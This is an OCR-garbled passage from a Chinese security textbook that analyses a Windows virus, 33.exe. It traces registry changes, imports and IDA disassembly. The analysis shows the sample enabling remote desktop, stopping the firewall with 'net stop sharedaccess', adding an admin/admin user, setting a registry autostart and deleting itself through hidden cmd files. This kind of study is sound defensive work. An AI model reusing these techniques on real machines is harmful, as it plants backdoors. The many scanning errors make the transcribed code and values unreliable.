O=- O- 3 [Q @| Pm чах Ө|2- 33 


E] C:\Documents and Settings Administrator E Ш\ЗЗ\Керог+. 1. html 


已 删除 键 (0) 快照 A 
















新 添加 键 (7) ВЕЕ в 

[HKEY LOCAL MACHINEYSOFTWARE|Microsoft|Windows|CurrentVersionnetcache] 
[HKEY LOCAL MACHINEYSYSTEMYControlSetOOiYControl| Terminal ServerYRDPTcp] 
[HKEY LOCAL MACHINEY|SYSTEM|ControlSetO001Services|RDPWD|Enum] 

[HKEY LOCAL МАСНІМЕ\ SYSTEM) Сопсго1Зет001\ Зегуісез\ TDTCP\ Enum] 

[HKEY LOCAL MACHINEYSYSTEMYCurrentControlSetiControl|Terminal ServerYRDPTcp] 
[HKEY LOCAL MACHINEASYSTEM|CurrentControlSet|ServicesiRDPWD|Enum] 

[HKEY LOCAL MACHINEY|SYSTEM|CurrentControlSet|Services|TDTCP|Enum] 








图 9-33 ”注册 表 变 化 (1) 
从 图 9-33 中 ， 可 以 看 出 新 添加 的 注册 表 键 值 ， 其 中 的 RDPTcp 和 TDTCP 均 为 启动 
“3389”， 也 就 是 远程 桌面 控制 的 注册 键 值 PortNumber 的 值 修改 为 3389。 
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己 删 除 值 (1) 快照 A 


[HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\WBEM\ WDM] 
"C:\\WINDOWS\\system32\\DRIVERS\\ ipnat . sys [ IPNATMofResource] "="LowDateTir 


新 添加 值 (15) 快照 
[HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\netcache] 
"Enabled"-"0" 

[HKEY LOCAL. MACHINEVSYSTEMA ControlSet001^ Control Terminal Server RDPTcp] 
"PortNunber"-dword:00000d3d 

[HKEY _LOCAL_MACHINE\ SYSTEM\ ControlSet001\ Services V RDPWD^ Enum] 
"O"-"RootYVLEGACY ВрРЫр\\0000" 

"Count"-dword:00000001 





"NextInstance"-dword:00000001 

[HKEY LOCAL MACHINES SYSTEM ControlSetO01^ Services, TDTCP^ Enum] 
"O"-"RootYVLEGACY TDTCPAVO000" 

"Count"-dword:00000001 

"NextInstance"-dword:00000001 

[HKEY. LOCAL. MACHINE SYSTEM CurrentControlSet' Control Terminal ServerNRDPTcp] 
"PortNumber"-dvord:00000d3d 

[HKEY. LOCAL, MACHINE SYSTEMS CurrentControlSet Services RDPWD' Enum] 
"O"-"RootYVLEGACY RDPUDYYOO00" 

"Count"-dword:00000001 





图 9-34 注册 表 变 化 (2) 


己 改 变 值 (13) 快照 A 


[HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Cryptography\RNG] 

"Seed"=hex:95, 60, аа, ee, 2a, e8,c4, 59,08,06, 4a, df, 3f,77,81,e2,51,e6,02,0f, 4d,83,\ 
26,84,46,ba,b1, 59, 6d, c£, 0c, 79, 5c, 05, 0b, c5, d3, 51, 5£,0c,b3,b0, 69, 56, dc, a1, ca, V 
0b,34,5d, 41,05, £7, £c,07, 50, 70, 36, 86, 46,28,2b, 5d, €7, 59, c1, ec, c4, 13, eb, 90,32, V 
fd,aa,2d,be, 73, ее, 3a, f0 


"Seed"-hex:0f,b3,11,2d, 18,bb,9f,c5,ce, 6b, 03,28, 15,43, 61,62, d0, e6, 4b, e4,75,24,V 
22,34, ас, 49, 13,89,30, dc, 50, 1c, 88,50, d7, c0,2a, 19, df, ec, ec, 2d, 38,43, 66, 57, cb, V 
08,06, 0b, 34, 42,59, 54,bc,09,09,0£,3c,c5,8e, 44, ae, аЗ, 44, 6c, ca, 12,b9,0e,95, 78, V 
Оа, 23,44,79, fb, e8, a5, e9 


[HKEY. LOCAL. MACHINE,SOFTWARE Microsoft Windows NT\ CurrentVersion\ ProfileList^ S-1-5-19] 
"'RefCount""dword:00000002 

"RefCount"-dword:00000001 

[HKEY. LOCAL. MACHINEVSYSTEM ControlSet001^ Control Terminal Server] 
"fDenyTSConnections"-dword:00000001 
"fDenyTSConnections"-dword:00000000 

[HKEY. LOCAL. MACHINE SYSTEM ControlSet001: Services) SharedAccess\ Epoch] 
"Epoch"*dword:00000018 

"Epoch""dword:00000019 

[HKEY. LOCAL. MACHINE, SYSTEM ControlSet001\ Services! TermDD] 
"Start""dword:00000001 

"Start""dvord:00000002 

[HKEY. LOCAL. MACHINE SYSTEM ControlSet001\ Services! TermService] 
"Stert"-dword:00000003 

"Start""dvord:00000002 








图 9-35 ”注册 表 变 化 (3) 
[HKEY USERS) .DEFAULT\ Keyboard Layout\ Toggle] 


"Hotkey"="1" 


"Hotkey"-"2" 
[HKEY USERS^S-1-5-18 Keyboard Layout Toggle] 
"Hotkey"-"i" 





"Hotkey"-"2" 
[HKEY CURRENT USER'*Software' Microsoft Windows NT CurrentVersion' Windows] 
"load"-"" 


"load"-"C:VVWINDOWSAYsystem321333. exe" 


9-36 ”注册 表 变 化 (4) 
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从 图 9-36 中 ， 也 就 是 HKEY CURRENT USER Software Microsoft Windows NTV 
CurrentVersion\Windows\load, Load ="С: \\WINDOWS\\system32\\33.exe", 可 以 看 出 33.exe 
将 其 自身 复制 进 系 统 目 录 ， 并 且 修 改 load 键 值 ， 实 现 程 序 随 注 册 表 自 启动 。 

运行 完 以 后 ，33.exe 从 桌面 上 “消失 ”， 工 具 procexp 捕 捉 到 cmd.exe 短 暂 的 运行 ( 见 
图 9-37) 过 程 ， 自 此 可 以 推断 其 利用 CMD 命 令 进行 自我 删除 。 


ili conne. ехе зав к з, Usb K. 11UU.Lonsole ME 
ogari exe — BE o7 1,556 K 1,616 X T96 Rindows Commar 


CPV 使 用 率 : 14.13% REER: 11.93€ 进程 数 : 31 内 存 使 用 率 : 27.04% 





图 9-37 ”工具 procexp 捕 捉 
从 桌面 右 下 角 出 现 防 火 墙 关闭 气泡 提示 ， 很 明显 地 看 出 该 病毒 也 关闭 了 系统 防火 墙 ， 


如 图 9-38 所 示 。 





Windows 检测 到 你 的 计算 机 寺前 未 经 防火 培 保 护 。 ed; “建议” 了 解 如 何 修复 此 问题 
‚ 防火 墙 如 何 帮助 保护 我 的 计算 机 ? 


备注 ; Windows 不 检测 所 有 的 防火 墙 。 


poca BERE s 
HESS JEN. i тл: BERENE 
D 4 


找 不 到 | 
ЕНУ ЕЕЕ Ла: 








备注 : Windows 不 检测 所 有 防 病毒 程序 。 


管理 安全 设置 : 





图 9-38 ”防火 墙 关闭 提示 
检测 ApateDNS， 发 现 并 没有 对 Internet 进 行 的 访问 ， 如 图 9-39 所 示 ， 说 明 病 毒 没有 悄 
悄 在 后 台 访问 网 站 或 下 载 其 他 病毒 。 


Т ApateDNS _ 
Capture Window [DNS Hex View] 




















Tine Donsin Requested DNS Returned 





[+] Using 127.0.0.1 as return ONS IP! 

[+] DNS set to 127.0.0.1 on Qualcomm Atheros AR9485W8-EG Wireless Network Adapter. 
[+] Sending valid DNS response of first request. 

[+] Server started at 22:48:45 successfully. 

















图 9-39 ApateDNS 截 获 
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再 次 进入 虚拟 机 ， 发 现 出 现 另 外 一 个 密码 用 户 ， 则 可 以 推断 病毒 利用 CMD 命 令 进行 
了 一 次 用 户 添加 操作 ， 如 图 9-40 所 示 。 





图 9-40 ”Windows 登 录 界 面 
使 用 快照 还 原 系统 ， 接 下 来 用 调试 工具 对 其 进行 源码 上 的 分 析 。 
首先 使 用 PEiD 进 行 查 过， 如 图 9-41 所 示 ， 查 壳 结 果 显 示 其 并 没有 被 加 壳 。 


"" PEiD v0.95 





Fie: K: Documents and Settingsladminl Ж\33.ехе 


Entrypoint: 1501 
File Offset: [0001501 

















图 9-41 EF 
接 下 来 ， 可 以 选择 Dependency Walker 或 者 Stud_PE 对 其 使 用 的 函数 进行 分 析 ， 在 
KERNEL32.DLL 截 获 的 函数 中 ，CopyFileA 与 CreateFileA 函 数 (СЛ. 9-42) 作为 移动 目标 
函数 将 “33.exe” 文 件 移 动 至 系统 目录 。 

























[п [ond ° [t | [Pasa jaurymPoi 
Г] Jot Bound 
um E ТШ TIED Not Bound 
EJ |н S2 (Dx0034) | CreateFileA Not Bound 
E) v 125 (050070) | Exi tProcess Not Bound 
EJ |н 170 (DxOOAA) | FlushFileBuffers Not Bound 
E |a 178 050082) | FreeEnvironmentStringsA Not Bound 
EJ |н 179 (00083) | FreeEnviroraentStrings Fot Bound 
E |н 185 (0x00B9) | GetACP Not Bound 
EJ |м 191 (Dx008F) | GetCFInfo Jot Bound 
EJ |н 202 (DxOOCA) | GetConnandLineA Wot Bound 
Е |н 247 050087) | GetCurrentProcess Met Bound 
EJ |н 262 050106) | GetEnvironmentStrings Fot Bound 
EJ [wA 264 (050108) | GetEavironmentStringsg Not Bound 
Е [wA 265 (0»0109) | cetEavirenmentyariableA Bet Bound 
EJ |н 277 (DxOLIS) | GetFileIype Not Bound 
ES [wA 282 (00114) | GetLastError Fot Bound 
EJ |m 292 (00124) | GetltoduleFi1eNaneA Жок Bound 
E (vA 294 (010126) | Getllodul elandl eA Not Bound 
EJ |н 305 (00131) | GetOENCP Not Bound 
EJ |н 318 00132) | GetFrochdáress. Jot Bound 
E [wA 336 (Dx0150) | GetStertupInfoA Fot Bound 
EJ |a 338 (050152) | GetStäHandle Жок Bound 
EJ |н 339 000153) | GetStringTypeA Not Bound 
E) |н 342 (Dx0156) | GetStringTypeg Not Bound 
EJ |н 345 000159) | GetSystenDirectoryA Fot Bound 
ES (vA 372 (00114) | GetVersion Fot Bound 
EJ |н 373 (Dx0175) | GetVersi onExA Net Bound 
E) |н 409 (0x0199) | HeapAlloe Jot Bound 
EJ |н 411 (DxDI9B) | HeapCreate Not Bound 
E) [v 413 00190) | KespDestroy Jot Bound 


7 
м 











LoadLibraryA 用 来 装载 DLL 文件 库 ， 在 本 例 中 是 装载 KERNEL32.DLL，WinExec 用 来 
执行 程序 ，WriteFile 则 是 写 入 文件 ， 如 图 9-43 所 示 。 
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EJ |н 447 (OxO1BF) | LCHMapStringÀ Not Bound 
EJ |н 448 (0x01CO) | LCHapStringl Not Bound 
EJ |» 450 (0x01C2) | LoadLibraryA Not Bound 
EJ |н 484 (OxO1E4) | ul tiByteToWideChar Not Bound 
EJ |н 559 (0x022F) | RtlUnwind Not Bound 
E] |н 618 (0x028A) | SetFilePointer Not Bound 
EJ |н 621 (Dx026D) | SetHandleCount Not Bound 
EJ |н 636 (Dx027C) | SetStdHandle Not Bound 
EJ |» 670 (0х029Е) | TerninateProcess Not Bound 
E] |н 685 (0x02AD) | UnhandledExceptionFilter Not Bound 
ЕП | 699 (0x02BB) | Virtuslklloc Not Bound 
E] |н TO3 (0x02BF) | VirtuslFree Not Bound 
EJ NA 722 (0x0202) | Wi deCharTolfultiByte Not Bound 
um E 723 (Dx02D3) WinExec Not Bound 
EJ [nA 735 (OxO2DF) | WriteFile Not Bound 











9-43 KERNEL32.DLL (2) 
ExitWindowsEx (С Й[ 9-44) 是 关机 程序 ， 目 的 是 为 了 在 Windows 系 统 下 修改 注册 表 
使 其 生效 并 重启 计算 机 。 








图 9-44 USER32.DLL 
如 图 9-45 所 示 的 最 后 三 个 修改 注册 表 的 函数 则 是 启动 “3389” 的 罪魁 祸首 。 经 过 查看 
函数 及 行为 分 析 ， 读 者 大 体 已 经 明白 了 该 病毒 的 功能 是 开启 远程 桌面 ， 关 闭 防火 墙 ， 建 立 
新 用 户 ， 自 启 重生 。 
ПШ Twas [am | 
— 
ËJ |н 347 (Dx0158) | RegCloseKey 


E |m 351 (0x015F) | Regerestelyeh 
EJ н 390 (0x0186) | RegSetValueExA 





图 9-45 ADVAPI32.DLL 
而 要 从 源码 上 更 深层 次 地 了 解 该 病毒 ， 就 需要 使 用 反 汇 编 工 具 一 一 IDA Pro/OD， 本 次 
我 们 利用 IDA Pro( 见 图 9-46〉 工 具 进 行 病毒 源码 的 分 析 。 





Amma Luxe ddr (uX 


Leid fila Cohorts and Sattinge Veiis MENS ee ge 


Teen pe 
[petat Са сакате ll opeeder] Tmotape] s 
m 
inm 和 
Lehman Foo |] ьон asta 























图 9-46 IDA Pro 
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单 击 OK 按钮 进入 主 界面 ， 出 现 如 图 9-47 所 示 的 反 汇编 文本 界面 。IDA Pro 还 支持 图 形 
模式 ， 按 “空格 ” 键 进行 切换 ， 如 图 9-48 所 示 。 


IDA 





Documents and Settings\adain AM 
File Edit Jup Search View Debugger Options 








Help 





BHje- s 


























Library function Í Data Regular function Unezplored Instruction ШЇ External symbol 








TA Vier 


в [9 Hex Vieh ojm Structures a[m 





-text 
-text 
-text 
„text 
-text 
-text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
-text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 
„text 











(00002001 


200101000 
0401000 
0401000 
:00501000 
:00501000 
0401000 
0401000 
0401000 
0401000 
0401000 
:00501000 
:00501000 
:00501000 
:00501000 
:00501000 
0401000 
0401000 
0401000 
0401000 
0401000 
0401000 
0401000 
0401000 
ШЫ] 
0101000 
0101000 
0101000 
0401000 
0401000 
0401000 
0401000 
0401000 














.text:00h01000 sub 401000 proc near ; CODE XREF: sub A01180*92,p 
-text:00h01000 š; MinMain(x,x,x,X)*1B4p ... 
-text:00h01000 

.text:00h01000 hkey = dword ptr а 








1000: sub 401000. 





File Name — : C:\Documents and SettingsNadninVAE [E33 . exe 
Fornat : Portable executable For 80386 (PE) 
Imagebase — : Ai 

Section 1. (virtual address 
Virtual size 











0&E78 ( 20088.) 
Section size in File 05000 ( 20480.) 
Offset to raw data For section: p 
Flags 60000020: Text Executable Readable 
Rlignment : default 

05 type : MS Windows 
Rpplication type: Executable 32bit 









include uni.inc ; see unicode subdir of ida for info on unicode 


-686p 
.nnx 
-model Flat 








Segnent type: Pure code 
Segnent permissions: Read/Execute 

text segment para public “CUDE” usesz 

assume cs: text 

зонд 010891 

assume es:nothing, ss:nothing, ds: data, Fs:nothing, gs:nothing 





-"SUBROUTINE 





; int — cdecl sub A81900(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, BYTE *lpData) 





图 9-47 文本 模式 


Mer Yi ech gun Structures alā Мол: mss 1 













push езі 
push ecx 
call 。 ds:RegereatekeyExh 
test вах, eax 

short loc ав10со 


dwüptions 
lptlass 
Reserved 
lpSubkey 
пкеу 






Eee 

















push езі 


call — sub amana 
add esp. 8 
pop ^ esi 





在 文本 模式 下 ， 旁 白 备 注 为 蓝 色 字体 ， 语 句 注释 则 用 绿色 字体 ， 粉 色 字体 表示 调 上 


push nffset afrrorhnRegcrea 






















; "error по RegtreateKeyEx s\n” loc. 401909: 


mov esi, [esp*heipüalueMame] 
mov вах, [espshelpSubKey] 

lea edx, [espetebata] 

push а ; chData 
push ебх } 1pData 
push а ; guType 
push а i Reserued 
push esi ; 1pUalueHane| 
push вах i Key 

call — ds:RegSetualuetaR 


test eax, вах 
je short 10с 1 





ға 








p 1 








[push esi 
push offset atrrorolegzetv ; "error no RegsetUaluctx ew" 
Сал Sub wrap 

[ш espo o 


пос нечвғв:= 
mw еск, [espeteipsubkey] 
push сх ; Mey 
call 。 ds:üegcloseKey 

pop esi 

|retn 











图 9-48 





形 模式 











函数 名 称 ， 灰 色 字 体 则 专门 对 offset 进 行 注释 。 
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IDA Рго ЕЛО ЕА. ТЕКЕЙ Р, КО ЕА 
件 跳 转 ， 绿 色 箭 头 @@ 表 示 该 跳 转 已 发 生 ， 而 蓝 色 箭头 则 表示 发 生 无 条 件 跳 转 ， 向 上 的 箭头 
则 通常 表示 循环 体 。 

仍然 从 函数 入 手 ， 这 里 使 用 较为 方便 的 图 形 模式 进行 源码 分 析 。 执 行 View 一 subviews 一 
Imports 命 令 ， 打 开 的 Imports 界 面 如 图 9-49 所 示 。 


IDA View-A 
























Library 
Ж) 00406000 LookupPrivilegeValueA ADVAPIS2 
r$] 00406004 AdjustTokenPrivileges ADVAPISZ 
fg) 00406008 Reg£reateKeyExA ADVAPISZ 
52) 0040600C RegSetValueExA ADVAPIS2 
Ni) 00406010 RegCloseKey ADVAPI32 
82) 00408014 ÜpenProcessToken ADVAPIS2 
R8) 0040601C CreateFileA XERNELS2 
82) 00406020 GetVersionExA XERNELS2 
frg] 00406024 WriteFile XERNELS2 
ig) 00406028 GetStringIypelt XERNELS2 
|) 0040602 GetStringIypeA XERNELS2 
R8) 00406030 CloseHandle KERNEL32 
82) 00406034 VinExec XERNELS2 
rg] 00406038 GetSystenDirectoryA KERNEL32 
fg) o040603C GetModuleFileNameÀ KERNEL32 
frg) 00406040 CopyFileA XERNELS2 
fg) 00406044 GetCurrentProcess KERNEL32 
Rg) 00406048 Getllodul eHandleA XERNELS2 
+š] 0040604С GetStartupInfoA XERNEL32 
fg) 00406050 GetConnendLineA XERNELS2 
frg) 00406054 GetVersion XERNELS2 
ig) 00406058 ExitProcess KERNEL32 
ig] 0040805C TerninateProcess XERNELS2 








图 9-49 Imports RH 
按 Ctrl+F 组 合 键 ， 或 者 直接 在 Imports 界 面 输入 函数 名 称 ， 就 会 自动 搜索 定位 到 该 函 
数 ， 先 选中 CreateFileA 函 数 ， 然 后 双击 它 进 入 反 汇 编 界面 〈 见 图 9-30) ， 在 此 就 可 以 看 出 
SN E 


5 sub 1012C0«10Íp 
; DATA XREF: ..- 


图 9-50 ”函数 的 反 汇 编 界面 
按 Ctrl+X 组 合 键 ， 启 动 Xref 界 面 (交叉 引用 ) 〈( 见 图 9-51) ， 这 里 列 出 了 函数 被 调用 
的 地 址 以 及 被 调用 的 次 数 。 


[E xrefs to CreateFileA 

















Directi Тур Address Text 
TE cal — dst eà 
Ё Vp r sub 401230415 call — ds:CreatepileA 
Ё Vp г sub 4012COH1B call — dsiCreateFileA 
"© o  .rdata:00408504 dd rva CreateFileA i Import Address Table 
Lx Cancel Search Help 
Line 1 of 5 


图 9-51 Xref 界 面 
选择 地 址 sub 401230+1B， 进 入 其 图 形 模式 ， 通 过 图 形 模式 可 以 清楚 地 看 到 该 函数 所 
附带 的 功能 及 运行 的 详细 流程 〈 见 图 9-32、 图 9-53) 。 


= 


EN U meses 


var CD- byte ptr -BCDh 












sub esp, 18hh 

push ebx 

push B ; hTenplateFile 

push 2 ; duFlagsfndüttributes 
push 2 ; duCreationDisposition 
push B ; 1pSecurityfttributes 
push 2 ; dwShareHode 

push ^48888888h ; dwDesiredfüccess 

push offset CndLine ; "del.cnd'" 


call ds:CreateFilef 
mou ebx, eax 

test ebx, ebx 

jz short loc ^8128D 























а c 
push esi 
push edi 
mou ecx, 8Ch 
mou esi, offset aMetStopShareda ; "net stop sharedaccess \r\n del 33.exe V"... 
lea edi, [еѕр+110һ+Виғғеғ] 
xor eax, eax 
rep mousd 
mousu 
mousb 
mou ecx, 33h 
lea edi, [esp*iiüh«var CD] 
rep stosd 
stosb 
lea eax, [esp*ii0he«NunberÜFBytesWritten] 
push 9 ; lpüverlapped 
push eax ; lpHumberÜüfBytesWritten 
lea ecx, [esp+118h*+Buffer] 
push 6*h ; nNunberOüFBytesToWrite 
push ecx lpBuffer 
push ebx ; hFile 
mou [esp+124h+Number0FfBytesWritten], 0 
call ds:WriteFile 
push ebx ; hobject 
call ds:CloseHandle 
m 
图 9-52 CreateFileA ( 1) 
2027 К Беч 
mou [esp*125h«NumberüfBytesWritten], 8 
call ds:WriteFile 
push ebx 3 hObject 
call ds:CloseHandle 
push 8 ; uCmdShow 


push offset CndLine ; "del.cmd'" 
call ds:VinExec 

pop edi 

pop esi 








图 9-53 CreateFileA ( 2 ) 
从 图 9-53 中 可 以 看 出 ， 首 先 映 入 眼帘 的 是 备注 offset CmdLine 的 “del.cmd” 语 句 ， 结 
合 后 文 的 aNetStopShareda 函 数 及 其 灰 字 备注 ， 可 以 得 出 该 自 删除 过 程 是 先 调用 CreateFileA 
函数 创建 了 一 个 CMD 命 令 文 件 ， 返 回 一 个 实例 句柄 ， 同 时 通过 WriteFile 预 先 写 好 命令 ， 实 
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现 关闭 防火 墙 以 及 删除 文件 自身 功能 。 然 后 ， 再 通过 最 后 的 WinExec 函 数 ” 革 到 hihiinl 
运行 该 “del.cmd” 删 除 自身 ， 并 且 设 置 其 窗口 为 隐藏 状态 ， 这 就 是 为 什 ito Imp S 
么 之 前 我 们 用 Process Monitor 检 测 到 了 CMD 在 一 瞬间 被 使 用 之 后 ，“33. : да = = + 
exe” 神 秘 消失 的 原因 ， 由 此 可 见 病毒 并 不 神秘 。 De 

之 后 我 们 可 以 单 击 界面 左上 角 Jump 菜 单 下 面 的 左 箭头 〈 见 图 9-54) — 图 9-54 ТШЕ 
回 到 刚才 的 CreateFileA 函 数 界 面 ， 然 后 调 出 Xref 选 择 第 2 个 地 址 sub 4012C0+1B， 并 进入 图 
形 模式 。 

对 比 上 例 “del.cmd”“add.cmd” 名 称 与 之 形成 鲜明 对 比 ， 该 过 程 则 是 通过 命令 “net 
user admin” 来 添加 新 用 户 ， 由 注释 可 知 新 添加 的 账户 以 及 密码 均 为 admin， 如 图 9-55 所 示 。 


var 95- byte ptr -95h 


esp, 18hh 
ebx 
; hTemplateFile 
; duFlagsündfttributes 
; duCreationDisposition| 
; lpSecurityAttributes 
; duShareHode 


40000008h ; duwDesiredhccess 
offset FileName ; "add.cmd'" 
ds:CreateFfileñ 

ebx, eax 

ebx, ebx 

Short loc 501330 














а о 

push esi 

push edi 

nou ecx, 1Ah 

mou esi, offset aNetUserfdminMe ; "net user admin \r\n net user admin admi"... 
lea edi, [esp+110n+Buffer] 

xor eax, eax 

rep mousd 

nousu 

mousb 

тоо есх, 25һ 

lea edi, [espetiühevar 95] 

rep stosd 

stosb 

lea eax，[esp*119h*Number0fBytesWritten] 
push 6 ; lpüverlapped 

push eax ; 1pNumberüFBytesWritten 
lea ecx, [esp+118n+Buffer] 

push 6snh ; nNumberüFBytesToWrite 
push ecx ; lpBuffer 

push ebx ; hFile 

nou [esp*i2nheNunberüfFBytesWritten], 8 
call ds:WriteFile 

push ebx ў hObject 

call ds:CloseHandle 

push 8 ; uCmdShow 

push offset FileName ; "add.cnd" 

call ds:WinExec 

pop edi 

pop esi 





图 9-55 CreateFileA (3) 


最 后 ， 在 C 语 言 中 来 看 看 这 些 函 数 的 真面目 。 


HANDLE CreateFile( 


LPCTSTR lpFileName, // 指 向 文件 名 称 的 指针 
DWORD dwDesiredAccess, // 访 问 权限 
DWORD dwShareMode, // 共 享 方式 
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LPSECURITY ATTRIBUTES lpSecurityAttributes,// 安 全 属性 


DWORD dwCreationDisposition, / /创建 标 志 
DWORD dwFlagsAndAttributes, // 文 件 属性 
HANDLE hTemplateFile // 模 板 文件 句柄 


); 


首先 来 认识 一 下 参数 前 的 类 型 声明 。 

> LPCSTR: 指针 字符 囊 类 型 ， 指 向 一 个 常量 字符 囊 ， 并 且 以 ”\0” 结 尾 ， 前 组 标识 
Alp; 

> DWORD: RF (32 位 ) 的 无 符号 长 度 单 位 ， 前 缓 标识 为 dw， 与 之 相近 的 WORD 
类 型 ， 为 双 字 节 (16 位 ) ， 前 组 Wi; 

> HANDLE: 实例 句柄 ， 被 用 于 Windows API 表 示 对 象 ; 

> HWND: 窗口 句柄 ， 前 缓 标识 为 h; 

> BOOL: 布尔 值 ， 前 缓 为 b; 

> UNIT: unsigned int， 无 符号 整数 。 

LPSECURITY _ ATTRIBUTES 则 为 一 个 结构 体 ， 具 体 代码 如 下 。 


typedef struct SECURITY ATTRIBUTES ( 


DWORD nLength; // 结 构 体 大 小 
LPVOID lpSecurityDescriptor; // 安 全 描述 符 
BOOL bInheritHandle ; // 判 断 句柄 是 否 安全 继承 


) SECURITY ATTRIBUTES; 


下 面 再 来 谈 谈 参 数值 设 定 。 

(1) lpFileName 一 般 设 置 为 文件 路 径 或 者 文件 的 名 称 。 

(2) dwDesiredAccess 设 置 为 GENERIC READ|GENERIC WRITE， 即 可 以 进行 读 写 操作 。 

(3) dwShareMode 可 以 为 0。 

(4) FILE SHARE DELETE, FILE SHARE READ, FILE SHARE WRITE 中 任意 
个 数 ， 分 别 为 不 可 共享 、 可 删除 、 可 读 、 可 写 。 

(5) LPSECURITY_ATTRIBUTES 则 通常 设置 为 NULL。 

(6) dwCreationDisposition， 表 示 对 文件 存在 与 否 所 执行 的 行为 ， 分 别 为 : 

> CREATE ALWAYS (创建 文件 ， 若 之 前 该 文件 存在 ， 则 覆盖 改写 上 一 个 文件 ) 。 

> CREATE NEW (创建 文件 ， 文 件 存在 时 报错 ) 。 

> OPEN ALWAYS (文件 不 存在 就 创建 文件 ) 。 

> OPEN EXISTING (文件 必须 已 经 存在 ) 。 

> TRUNCATE EXISTING (文件 长 度 清 零 ) 。 

(7) dwFlagsAndAttributes， 病 毒 一 般 会 设置 为 FILE_ ATTRIBUTE _ HIDDEN， 也 就 是 
文件 处 于 隐藏 状态 。 
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(8) hTemplateFile， 若 无 模板 设置 为 NULL 。 
由 此 就 可 以 推断 “delcmd” 以 及 “add.cmd” 的 CreateFile 调 用 方式 为 : 声明 一 个 句柄 
Handle xxx 来 接收 CreateFile 的 返回 值 ， 即 


HANDLE XXX = CreateFile("del/add.cmd",GENERIC WRITE, FILE SHARE _ 
WRITE, 0, CREATE ALWAYS, FILE ATTRIBUTE HIDDEN, NULL); 


是 不 是 很 简单 ? 完成 了 创建 文件 的 操作 ， 下 一 步 就 是 对 文件 进行 读 写 操作 了 ， 即 使 用 
WriteFile 函 数 来 实现 。 


BOOL WriteFile( 





HANDLE hFile, // 文 件 句柄 

LPCVOID lpBuffer, // 写 入 数据 缓存 区 的 指针 

DWORD nNumberOfBytesToWrite, // 写 入 字 节 数 

LPDWORD lpNumberOfBytesWritten，// 用 于 保存 实际 写 入 字 节 数 的 指针 
LPOVERLAPPED lpOverlapped // 用 于 指向 保存 I/o 异 步 信 息 的 结构 体 


); 


很 显然 ， 在 本 例 中 的 WriteFile 函 数 第 1 个 参数 hFile 是 之 前 调用 CreateFile 函 数 创建 的 
xxx 句 柄 。 第 2 个 参数 IpBuffer 以 及 第 3 个 参数 nNumberOfBytesToWrite 则 是 用 来 写 入 自 删 / 
创建 用 户 的 代码 ， 第 4 个 参数 jpNumberOfBytesWritten 则 指向 实际 写 入 的 代码 ， 最 后 一 个 
lpOverlapped 通 常设 置 为 NULL。 
之 后 执行 的 是 CloseHandle 函 数 ， 因 为 之 前 调用 CreateFile 时 创建 了 一 个 xxx 句 柄 ， 
在 文件 读 写 操作 结束 以 后 要 关闭 这 个 句柄 ， 以 防 被 其 他 函数 误 用 并 且 释 放 系统 内 核资 源 
CHANDLE 句 柄 资源 ) o 


BOOL CloseHandle( 
HANDLE hObject // 句 柄 名 
); 
CloseHandle (X X X);// 就 可 以 关闭 句柄 了 


接着 ， 则 使 用 WinExec 函 数 运行 CMD 命 令 行 程序 ， 整 个 过 程 就 结束 了 。WinExec 函 数 
包含 两 个 参数 ， 具 体 如 下 : 


UINT WINAPI WinExec( 

In  LPCSTR 1pcmdLine，// 命 令 行 代 码 参 数 
In UINT uCmdShow // 命 令 窗口 

); 


第 1 个 参数 lpCmdLine 是 之 前 生成 的 CMD 程 序 ， 第 2 个 参数 uCmdShow 根 据 分 析 来 看 则 
是 隐藏 窗口 ， 也 就 是 设置 为 SW_HIDE。 
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WinExec ("del.cmd", SW_HIDE) ; // 调 入 运行 状态 


通过 查阅 MSDN (微软 提供 的 强大 函数 库 查 询 工 具 ) ， 可 以 了 解 函数 参数 的 详细 信 
息 ， 而 函数 后 级 如 CrateFileA 的 后 级 A 则 表示 编码 方式 为 ASCII 码 ，W 则 表示 Unicode 编 码 ， 
Ex 则 表示 最 新 发 布 。 

接 下 来 看 看 该 病毒 对 于 3389 的 开启 过 程 〈 见 图 9-56) 。 

















ратат апа рст гт 
поо ecx, [espehkey] 
push esi 
nov esi, [espeh«1pSubKey] 
lea eax, [espei«1pSubKey] 
push в ; lpdwDisposition 
push вах ; phkResult 
push 0 ; IpSecurityüttributes 
push BF 863Fh ; sanDesired 
push — 6 ; dwüptions 
push 0 ; 1рС1а55 
push. в ; Reserved 
push esi ; lpSubKey 
push ecx ; hKey 
call ds:RegCreateKeyExR 
test вах, eax 
TCR 




















as п CEE 
push esi 
push offset aErrorNoRegcrea ; "error no RegCreateKeyEx s\n" loc 491039: 
call ^ sub 01400 nov edx, [esp+4+1pData] 
ada esp, 8 push edi 
pop esi nov edi, edx 
or ecx, ÜFFFFFFFFh 
xor eax, eax 
nov esi, [espeS8«1pUalueNane] 
repne scasb 
ot ecx 
dec ecx 
push ecx ; cbpata 
push edx ; lpData 
тоо edx, [esp*10h+1pSubKeu] 
push 1 ; dwType 
push eax ; Reserved 
push esi 1pUalueHane| 
push edx hey 


call ^ ds:RegSetUalueEx 
test вах, ea 

















图 9-56 ”注册 表 过 程 (1) 

很 明显 从 其 使 用 的 注册 表 函 数 RegCreateKeyExA、RegSetValueExA、RegCloseKey 
得 知 ， 该 图 形 过 程 所 代表 程序 的 作用 是 修改 之 前 使 用 Regshot 快 照 得 出 的 注册 表 键 值 ， 也 
就 是 : 

HEKY LOCAL MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\RDPTcp 

HEKY LOCAL MACHINE\SYSTEM\ControlSet001\Services\RDPWD\Enum 

HEKY LOCAL MACHINE SYSTEM ControlSet00 ] Services TDTCP'Enum 

HEKY LOCAL MACHINE SYSTEM CurrentControlSet Control Terminal Server RDPTcp 

HEKY LOCAL MACHINE SYSTEM CurrentControlSet'Services RDPWD'Enum 

HEKY LOCAL MACHINE SYSTEM CurrentControlSet'Services TDTCP'Enum 

等 等 。 

分 析 一 下 流程 ， 这 个 程序 使 用 RegCreateKeyExA 来 打开 /创建 以 上 的 注册 表 ， 并 且 返 回 
创建 一 个 实例 句柄 。 这 里 出 现 一 个 条 件 跳 转 语句 ， 如 果 函 数 调用 失败 则 返回 error 并 且 退 出 
